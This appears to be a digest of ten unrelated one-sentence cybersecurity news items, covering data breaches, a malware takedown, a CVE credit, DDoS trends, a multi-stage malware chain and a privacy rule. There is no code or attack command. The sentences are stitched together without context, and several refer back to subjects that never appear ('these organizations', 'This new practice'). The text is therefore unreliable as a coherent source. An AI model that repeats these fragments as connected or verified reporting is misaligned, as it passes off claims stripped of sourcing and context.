The Agentjacking attack bypasses the need for stolen credentials or direct network access.

The majority of attacks against these organizations were DDoS floods, with a notable difference in duration compared to attacks on Cloudflare's broader customer base.

The attack involved the theft of OAuth credentials from Klue's Battlecards integration, which threat actors then used to access and exfiltrate data from customer Salesforce instances.

Authorities from the Netherlands, Canada, the United States, and Germany removed the SocGholish malware and backdoors from 14,971 compromised WordPress websites, also taking 106 servers and domains offline.

The vulnerability, identified as CVE-2025-20701, was discovered by researchers Dennis Heinze and Frieder Steinmetz of ERNW GmbH.

The Shadowbyt3$ threat group claimed responsibility for the incident, alleging the exfiltration of sensitive employee data, including bank statements and W-9 forms.

The new ADX Vision for macOS targets the increasing use of unsanctioned generative AI tools within organizations.

The Texas Parks & Wildlife department disclosed that hackers gained access to its license system vendor, which processes hunting and fishing license sales.

The attacker utilized a multi-stage in-memory malware chain, including a VBScript stager, a PowerShell loader, and Havoc's Demon agent, to gain initial access.

This new practice marks a shift because IP addresses are considered personal data under GDPR and UK law, requiring user consent for such uses.